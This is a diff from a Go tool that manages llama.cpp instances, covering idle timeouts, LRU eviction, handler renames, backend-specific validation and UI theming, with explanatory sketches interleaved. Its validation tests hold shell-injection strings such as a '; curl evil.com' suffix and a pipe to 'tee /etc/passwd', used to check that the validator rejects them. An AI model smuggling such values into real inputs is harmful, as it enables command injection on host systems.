t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
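These tests lean on a createTestManager helper defined elsewhere in the test package. A minimal sketch consistent with the assertions above (ports drawn from 8000-9000, the same config fields used in the limit test) might look like this; the MaxInstances value here is an assumption:

// Hypothetical helper, shown for context only; the real one lives in
// another file of package manager_test. MaxInstances: 10 is an assumed value.
func createTestManager() manager.InstanceManager {
	cfg := config.InstancesConfig{
		PortRange:            [2]int{8000, 9000}, // matches the port-range assertions above
		MaxInstances:         10,
		TimeoutCheckInterval: 5,
	}
	return manager.NewInstanceManager(cfg)
}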

pkg/manager/timeout.go (new file, 64 lines)

@@ -0,0 +1,64 @@
package manager
import (
"fmt"
"llamactl/pkg/instance"
"log"
)
func (im *instanceManager) checkAllTimeouts() {
im.mu.RLock()
var timeoutInstances []string
// Identify instances that should timeout
for _, inst := range im.instances {
if inst.ShouldTimeout() {
timeoutInstances = append(timeoutInstances, inst.Name)
}
}
im.mu.RUnlock() // Release read lock before calling StopInstance
// Stop the timed-out instances
for _, name := range timeoutInstances {
log.Printf("Instance %s has timed out, stopping it", name)
if _, err := im.StopInstance(name); err != nil {
log.Printf("Error stopping instance %s: %v", name, err)
} else {
log.Printf("Instance %s stopped successfully", name)
}
}
}
// EvictLRUInstance finds and stops the least recently used running instance.
func (im *instanceManager) EvictLRUInstance() error {
im.mu.RLock()
var lruInstance *instance.Process
for name := range im.runningInstances {
inst := im.instances[name]
if inst == nil {
continue
}
opts := inst.GetOptions()
if opts == nil || opts.IdleTimeout == nil || *opts.IdleTimeout <= 0 {
continue // Skip instances without a valid idle timeout; they are never evicted
}
if lruInstance == nil || inst.LastRequestTime() < lruInstance.LastRequestTime() {
lruInstance = inst
}
}
im.mu.RUnlock()
if lruInstance == nil {
return fmt.Errorf("failed to find lru instance")
}
// Evict the selected instance
_, err := im.StopInstance(lruInstance.Name)
return err
}
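checkAllTimeouts holds only a read lock while scanning and releases it before stopping anything, so a slow StopInstance cannot block other readers. It is presumably driven by a periodic ticker based on TimeoutCheckInterval; a self-contained sketch of that polling pattern (the names and wiring are illustrative, not the actual constructor code):

package main

import (
	"fmt"
	"time"
)

// runTimeoutChecker invokes check every intervalMinutes until stop is closed,
// mirroring the poll-then-stop pattern of checkAllTimeouts above.
func runTimeoutChecker(intervalMinutes int, check func(), stop <-chan struct{}) {
	ticker := time.NewTicker(time.Duration(intervalMinutes) * time.Minute)
	defer ticker.Stop()
	for {
		select {
		case <-ticker.C:
			check()
		case <-stop:
			return
		}
	}
}

func main() {
	stop := make(chan struct{})
	go runTimeoutChecker(5, func() { fmt.Println("checking timeouts") }, stop)
	time.Sleep(100 * time.Millisecond)
	close(stop)
}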

pkg/manager/timeout_test.go (new file, 328 lines)

@@ -0,0 +1,328 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"sync"
"testing"
"time"
)
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.SetStatus(instance.Running)
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.SetStatus(instance.Stopped)
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.SetStatus(instance.Running) // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_Success(t *testing.T) {
manager := createTestManager()
// Don't defer manager.Shutdown() - we'll handle cleanup manually
// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model1.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model3.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
inst1, err := manager.CreateInstance("instance-1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst2, err := manager.CreateInstance("instance-2", options2)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst3, err := manager.CreateInstance("instance-3", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Set up mock time and set instances to running
mockTime := NewMockTimeProvider(time.Now())
inst1.SetTimeProvider(mockTime)
inst2.SetTimeProvider(mockTime)
inst3.SetTimeProvider(mockTime)
inst1.SetStatus(instance.Running)
inst2.SetStatus(instance.Running)
inst3.SetStatus(instance.Running)
// Set different last request times (oldest to newest)
// inst1: oldest (will be evicted)
inst1.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst2.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst3.UpdateLastRequestTime()
// Evict LRU instance (should be inst1)
err = manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify inst1 is stopped
if inst1.IsRunning() {
t.Error("Expected instance-1 to be stopped after eviction")
}
// Verify inst2 and inst3 are still running
if !inst2.IsRunning() {
t.Error("Expected instance-2 to still be running")
}
if !inst3.IsRunning() {
t.Error("Expected instance-3 to still be running")
}
// Clean up manually - set the remaining instances to stopped
inst2.SetStatus(instance.Stopped)
inst3.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
// Helper function to create instances with different timeout configurations
createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Process {
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: model,
},
IdleTimeout: timeout,
}
inst, err := manager.CreateInstance(name, options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
return inst
}
t.Run("no running instances", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no running instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
})
t.Run("only instances without timeout", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create instances with various non-eligible timeout configurations
zeroTimeout := 0
negativeTimeout := -1
inst1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model1.gguf", &zeroTimeout)
inst2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model2.gguf", &negativeTimeout)
inst3 := createInstanceWithTimeout(manager, "no-timeout-3", "/path/to/model3.gguf", nil)
// Set instances to running
instances := []*instance.Process{inst1, inst2, inst3}
for _, inst := range instances {
inst.SetStatus(instance.Running)
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
inst.SetStatus(instance.Stopped)
}
}()
// Try to evict - should fail because no eligible instances
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no eligible instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
// Verify all instances are still running
for i, inst := range instances {
if !inst.IsRunning() {
t.Errorf("Expected instance %d to still be running", i+1)
}
}
})
t.Run("mixed instances - evicts only eligible ones", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create mix of instances: some with timeout enabled, some disabled
validTimeout := 1
zeroTimeout := 0
instWithTimeout := createInstanceWithTimeout(manager, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
instNoTimeout1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
instNoTimeout2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
// Set all instances to running
instances := []*instance.Process{instWithTimeout, instNoTimeout1, instNoTimeout2}
for _, inst := range instances {
inst.SetStatus(instance.Running)
inst.UpdateLastRequestTime()
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
if inst.IsRunning() {
inst.SetStatus(instance.Stopped)
}
}
}()
// Evict LRU instance - should only consider the one with timeout
err := manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify only the instance with timeout was evicted
if instWithTimeout.IsRunning() {
t.Error("Expected with-timeout instance to be stopped after eviction")
}
if !instNoTimeout1.IsRunning() {
t.Error("Expected no-timeout-1 instance to still be running")
}
if !instNoTimeout2.IsRunning() {
t.Error("Expected no-timeout-2 instance to still be running")
}
})
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}
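MockTimeProvider only needs a Now method to stand in for the real clock, which suggests that instance.SetTimeProvider accepts a one-method interface along these lines; the actual definition lives in the instance package, so treat this shape as an assumption:

// Assumed shape of the interface behind SetTimeProvider.
type TimeProvider interface {
	Now() time.Time
}

// Typical use in the tests above: freeze the clock, record a request,
// then jump past the idle window so ShouldTimeout flips to true.
func advancePastIdleTimeout(inst *instance.Process) {
	mock := NewMockTimeProvider(time.Now())
	inst.SetTimeProvider(mock)
	inst.UpdateLastRequestTime()
	mock.SetTime(mock.Now().Add(2 * time.Minute)) // beyond a 1-minute idle timeout
}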


@@ -28,7 +28,23 @@ func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
 }
 }

-// HelpHandler godoc
+// VersionHandler godoc
+// @Summary Get llamactl version
+// @Description Returns the version of the llamactl command
+// @Tags version
+// @Security ApiKeyAuth
+// @Produces text/plain
+// @Success 200 {string} string "Version information"
+// @Failure 500 {string} string "Internal Server Error"
+// @Router /version [get]
+func (h *Handler) VersionHandler() http.HandlerFunc {
+return func(w http.ResponseWriter, r *http.Request) {
+w.Header().Set("Content-Type", "text/plain")
+fmt.Fprintf(w, "Version: %s\nCommit: %s\nBuild Time: %s\n", h.cfg.Version, h.cfg.CommitHash, h.cfg.BuildTime)
+}
+}
+
+// LlamaServerHelpHandler godoc
 // @Summary Get help for llama server
 // @Description Returns the help text for the llama server command
 // @Tags server
@@ -37,7 +53,7 @@ func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
 // @Success 200 {string} string "Help text"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /server/help [get]
-func (h *Handler) HelpHandler() http.HandlerFunc {
+func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
 return func(w http.ResponseWriter, r *http.Request) {
 helpCmd := exec.Command("llama-server", "--help")
 output, err := helpCmd.CombinedOutput()
@@ -50,7 +66,7 @@ func (h *Handler) HelpHandler() http.HandlerFunc {
 }
 }

-// VersionHandler godoc
+// LlamaServerVersionHandler godoc
 // @Summary Get version of llama server
 // @Description Returns the version of the llama server command
 // @Tags server
@@ -59,7 +75,7 @@ func (h *Handler) HelpHandler() http.HandlerFunc {
 // @Success 200 {string} string "Version information"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /server/version [get]
-func (h *Handler) VersionHandler() http.HandlerFunc {
+func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
 return func(w http.ResponseWriter, r *http.Request) {
 versionCmd := exec.Command("llama-server", "--version")
 output, err := versionCmd.CombinedOutput()
@@ -72,7 +88,7 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
 }
 }

-// ListDevicesHandler godoc
+// LlamaServerListDevicesHandler godoc
 // @Summary List available devices for llama server
 // @Description Returns a list of available devices for the llama server
 // @Tags server
@@ -81,7 +97,7 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
 // @Success 200 {string} string "List of devices"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /server/devices [get]
-func (h *Handler) ListDevicesHandler() http.HandlerFunc {
+func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
 return func(w http.ResponseWriter, r *http.Request) {
 listCmd := exec.Command("llama-server", "--list-devices")
 output, err := listCmd.CombinedOutput()
@@ -100,7 +116,7 @@ func (h *Handler) ListDevicesHandler() http.HandlerFunc {
 // @Tags instances
 // @Security ApiKeyAuth
 // @Produces json
-// @Success 200 {array} Instance "List of instances"
+// @Success 200 {array} instance.Process "List of instances"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances [get]
 func (h *Handler) ListInstances() http.HandlerFunc {
@@ -127,8 +143,8 @@ func (h *Handler) ListInstances() http.HandlerFunc {
 // @Accept json
 // @Produces json
 // @Param name path string true "Instance Name"
-// @Param options body CreateInstanceOptions true "Instance configuration options"
-// @Success 201 {object} Instance "Created instance details"
+// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
+// @Success 201 {object} instance.Process "Created instance details"
 // @Failure 400 {string} string "Invalid request body"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name} [post]
@@ -168,7 +184,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
-// @Success 200 {object} Instance "Instance details"
+// @Success 200 {object} instance.Process "Instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name} [get]
@@ -202,8 +218,8 @@ func (h *Handler) GetInstance() http.HandlerFunc {
 // @Accept json
 // @Produces json
 // @Param name path string true "Instance Name"
-// @Param options body CreateInstanceOptions true "Instance configuration options"
-// @Success 200 {object} Instance "Updated instance details"
+// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
+// @Success 200 {object} instance.Process "Updated instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name} [put]
@@ -242,7 +258,7 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
-// @Success 200 {object} Instance "Started instance details"
+// @Success 200 {object} instance.Process "Started instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name}/start [post]
@@ -256,6 +272,12 @@ func (h *Handler) StartInstance() http.HandlerFunc {
 inst, err := h.InstanceManager.StartInstance(name)
 if err != nil {
+// Check if error is due to maximum running instances limit
+if _, ok := err.(manager.MaxRunningInstancesError); ok {
+http.Error(w, err.Error(), http.StatusConflict)
+return
+}
+
 http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
 return
 }
@@ -275,7 +297,7 @@ func (h *Handler) StartInstance() http.HandlerFunc {
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
-// @Success 200 {object} Instance "Stopped instance details"
+// @Success 200 {object} instance.Process "Stopped instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name}/stop [post]
@@ -308,7 +330,7 @@ func (h *Handler) StopInstance() http.HandlerFunc {
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
-// @Success 200 {object} Instance "Restarted instance details"
+// @Success 200 {object} instance.Process "Restarted instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name}/restart [post]
@@ -435,7 +457,7 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
 return
 }

-if !inst.Running {
+if !inst.IsRunning() {
 http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
 return
 }
@@ -456,6 +478,9 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
 proxyPath = "/" + proxyPath
 }

+// Update the last request time for the instance
+inst.UpdateLastRequestTime()
+
 // Modify the request to remove the proxy prefix
 originalPath := r.URL.Path
 r.URL.Path = proxyPath
@@ -555,17 +580,48 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
 return
 }

-if !inst.Running {
+if !inst.IsRunning() {
+allowOnDemand := inst.GetOptions() != nil && inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart
+if !allowOnDemand {
 http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
 return
 }
+
+if h.InstanceManager.IsMaxRunningInstancesReached() {
+if h.cfg.Instances.EnableLRUEviction {
+err := h.InstanceManager.EvictLRUInstance()
+if err != nil {
+http.Error(w, "Cannot start Instance, failed to evict instance "+err.Error(), http.StatusInternalServerError)
+return
+}
+} else {
+http.Error(w, "Cannot start Instance, maximum number of instances reached", http.StatusConflict)
+return
+}
+}
+
+// On-demand start is enabled, so start the instance
+if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
+http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
+return
+}
+
+// Wait for the instance to become healthy before proceeding
+if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil {
+http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
+return
+}
+}

 proxy, err := inst.GetProxy()
 if err != nil {
 http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
 return
 }

+// Update last request time for the instance
+inst.UpdateLastRequestTime()
+
 // Recreate the request body from the bytes we read
 r.Body = io.NopCloser(bytes.NewReader(bodyBytes))
 r.ContentLength = int64(len(bodyBytes))
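The new VersionHandler is straightforward to exercise with net/http/httptest. A minimal sketch; the request path and the reuse of a createTestManager-style helper are assumptions, while the AppConfig field names (Version, CommitHash, BuildTime) come from the handler body above:

func TestVersionHandler(t *testing.T) {
	cfg := config.AppConfig{Version: "v1.0.0", CommitHash: "abc123", BuildTime: "2025-09-03"}
	h := NewHandler(createTestManager(), cfg)

	req := httptest.NewRequest(http.MethodGet, "/version", nil)
	rec := httptest.NewRecorder()
	h.VersionHandler()(rec, req) // invoke the returned http.HandlerFunc directly

	if rec.Code != http.StatusOK {
		t.Fatalf("expected 200 OK, got %d", rec.Code)
	}
	if !strings.Contains(rec.Body.String(), "Version: v1.0.0") {
		t.Errorf("unexpected body: %q", rec.Body.String())
	}
}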


@@ -8,7 +8,7 @@ import (
 "github.com/go-chi/cors"
 httpSwagger "github.com/swaggo/http-swagger"

-_ "llamactl/docs"
+_ "llamactl/apidocs"

 "llamactl/webui"
 )
@@ -42,10 +42,12 @@ func SetupRouter(handler *Handler) *chi.Mux {
 r.Use(authMiddleware.AuthMiddleware(KeyTypeManagement))
 }

+r.Get("/version", handler.VersionHandler()) // Get llamactl version
+
 r.Route("/server", func(r chi.Router) {
-r.Get("/help", handler.HelpHandler())
-r.Get("/version", handler.VersionHandler())
-r.Get("/devices", handler.ListDevicesHandler())
+r.Get("/help", handler.LlamaServerHelpHandler())
+r.Get("/version", handler.LlamaServerVersionHandler())
+r.Get("/devices", handler.LlamaServerListDevicesHandler())
 })

 // Instance management endpoints


@@ -2,6 +2,7 @@ package validation
 import (
 "fmt"
+"llamactl/pkg/backends"
 "llamactl/pkg/instance"
 "reflect"
 "regexp"
@@ -33,20 +34,35 @@ func validateStringForInjection(value string) error {
 return nil
 }

-// ValidateInstanceOptions performs minimal security validation
+// ValidateInstanceOptions performs validation based on backend type
 func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
 if options == nil {
 return ValidationError(fmt.Errorf("options cannot be nil"))
 }

+// Validate based on backend type
+switch options.BackendType {
+case backends.BackendTypeLlamaCpp:
+return validateLlamaCppOptions(options)
+default:
+return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
+}
+}
+
+// validateLlamaCppOptions validates llama.cpp specific options
+func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
+if options.LlamaServerOptions == nil {
+return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
+}
+
 // Use reflection to check all string fields for injection patterns
-if err := validateStructStrings(&options.LlamaServerOptions, ""); err != nil {
+if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
 return err
 }

-// Basic network validation - only check for reasonable ranges
-if options.Port < 0 || options.Port > 65535 {
-return ValidationError(fmt.Errorf("invalid port range"))
+// Basic network validation for port
+if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
+return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
 }

 return nil
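Callers now route everything through the backend-type switch. A minimal sketch of using the reworked validator, mirroring the valid case exercised by the tests below:

func exampleValidate() error {
	opts := &instance.CreateInstanceOptions{
		BackendType: backends.BackendTypeLlamaCpp,
		LlamaServerOptions: &llamacpp.LlamaServerOptions{
			Model: "/path/to/model.gguf",
			Port:  8080,
		},
	}
	// Rejects unsupported backend types, nil llama.cpp options,
	// shell-injection patterns in string fields, and out-of-range ports.
	return validation.ValidateInstanceOptions(opts)
}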


@@ -1,6 +1,7 @@
 package validation_test

 import (
+"llamactl/pkg/backends"
 "llamactl/pkg/backends/llamacpp"
 "llamactl/pkg/instance"
 "llamactl/pkg/testutil"
@@ -83,7 +84,8 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
 for _, tt := range tests {
 t.Run(tt.name, func(t *testing.T) {
 options := &instance.CreateInstanceOptions{
-LlamaServerOptions: llamacpp.LlamaServerOptions{
+BackendType: backends.BackendTypeLlamaCpp,
+LlamaServerOptions: &llamacpp.LlamaServerOptions{
 Port: tt.port,
 },
 }
@@ -136,7 +138,8 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
 t.Run(tt.name, func(t *testing.T) {
 // Test with Model field (string field)
 options := &instance.CreateInstanceOptions{
-LlamaServerOptions: llamacpp.LlamaServerOptions{
+BackendType: backends.BackendTypeLlamaCpp,
+LlamaServerOptions: &llamacpp.LlamaServerOptions{
 Model: tt.value,
 },
 }
@@ -173,7 +176,8 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
 t.Run(tt.name, func(t *testing.T) {
 // Test with Lora field (array field)
 options := &instance.CreateInstanceOptions{
-LlamaServerOptions: llamacpp.LlamaServerOptions{
+BackendType: backends.BackendTypeLlamaCpp,
+LlamaServerOptions: &llamacpp.LlamaServerOptions{
 Lora: tt.array,
 },
 }
@@ -196,7 +200,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 {
 name: "injection in model field",
 options: &instance.CreateInstanceOptions{
-LlamaServerOptions: llamacpp.LlamaServerOptions{
+BackendType: backends.BackendTypeLlamaCpp,
+LlamaServerOptions: &llamacpp.LlamaServerOptions{
 Model: "safe.gguf",
 HFRepo: "microsoft/model; curl evil.com",
 },
@@ -206,7 +211,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 {
 name: "injection in log file",
 options: &instance.CreateInstanceOptions{
-LlamaServerOptions: llamacpp.LlamaServerOptions{
+BackendType: backends.BackendTypeLlamaCpp,
+LlamaServerOptions: &llamacpp.LlamaServerOptions{
 Model: "safe.gguf",
 LogFile: "/tmp/log.txt | tee /etc/passwd",
 },
@@ -216,7 +222,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 {
 name: "all safe fields",
 options: &instance.CreateInstanceOptions{
-LlamaServerOptions: llamacpp.LlamaServerOptions{
+BackendType: backends.BackendTypeLlamaCpp,
+LlamaServerOptions: &llamacpp.LlamaServerOptions{
 Model: "/path/to/model.gguf",
 HFRepo: "microsoft/DialoGPT-medium",
 LogFile: "/tmp/llama.log",
@@ -244,7 +251,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
 AutoRestart: testutil.BoolPtr(true),
 MaxRestarts: testutil.IntPtr(5),
 RestartDelay: testutil.IntPtr(10),
-LlamaServerOptions: llamacpp.LlamaServerOptions{
+BackendType: backends.BackendTypeLlamaCpp,
+LlamaServerOptions: &llamacpp.LlamaServerOptions{
 Port: 8080,
 GPULayers: 32,
 CtxSize: 4096,


@@ -7,6 +7,7 @@ import SystemInfoDialog from "./components/SystemInfoDialog";
 import { type CreateInstanceOptions, type Instance } from "@/types/instance";
 import { useInstances } from "@/contexts/InstancesContext";
 import { useAuth } from "@/contexts/AuthContext";
+import { ThemeProvider } from "@/contexts/ThemeContext";

 function App() {
 const { isAuthenticated, isLoading: authLoading } = useAuth();
@@ -29,9 +30,9 @@ function App() {
 const handleSaveInstance = (name: string, options: CreateInstanceOptions) => {
 if (editingInstance) {
-updateInstance(editingInstance.name, options);
+void updateInstance(editingInstance.name, options);
 } else {
-createInstance(name, options);
+void createInstance(name, options);
 }
 };
@@ -42,27 +43,32 @@ function App() {
 // Show loading spinner while checking auth
 if (authLoading) {
 return (
-<div className="min-h-screen bg-gray-50 flex items-center justify-center">
+<ThemeProvider>
+<div className="min-h-screen bg-background flex items-center justify-center">
 <div className="text-center">
-<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div>
-<p className="text-gray-600">Loading...</p>
+<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
+<p className="text-muted-foreground">Loading...</p>
 </div>
 </div>
+</ThemeProvider>
 );
 }

 // Show login dialog if not authenticated
 if (!isAuthenticated) {
 return (
-<div className="min-h-screen bg-gray-50">
+<ThemeProvider>
+<div className="min-h-screen bg-background">
 <LoginDialog open={true} />
 </div>
+</ThemeProvider>
 );
 }

 // Show main app if authenticated
 return (
-<div className="min-h-screen bg-gray-50">
+<ThemeProvider>
+<div className="min-h-screen bg-background">
 <Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} />
 <main className="container mx-auto max-w-4xl px-4 py-8">
 <InstanceList editInstance={handleEditInstance} />
@@ -80,6 +86,7 @@ function App() {
 onOpenChange={setIsSystemInfoModalOpen}
 />
 </div>
+</ThemeProvider>
 );
 }


@@ -5,6 +5,7 @@ import App from '@/App'
